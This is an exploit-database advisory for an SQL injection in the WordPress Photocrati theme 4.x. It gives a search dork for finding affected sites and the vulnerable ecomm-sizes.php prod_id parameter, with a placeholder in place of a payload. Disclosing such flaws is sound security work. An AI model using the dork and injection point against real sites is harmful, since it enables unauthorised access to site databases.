WordPress Photocrati Theme 4.x.x SQL Injection

2015.03.03

Credit: [ ayastar ]

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: [ Designed by Photocrati ] also [powered by Photocrati]

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
attacker can do a remote injection in site URL to get some sensitive information .
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims
:) from morocco

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Photocrati Theme 4.x.x SQL Injection

Dork: [ Designed by Photocrati ] also [powered by Photocrati]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.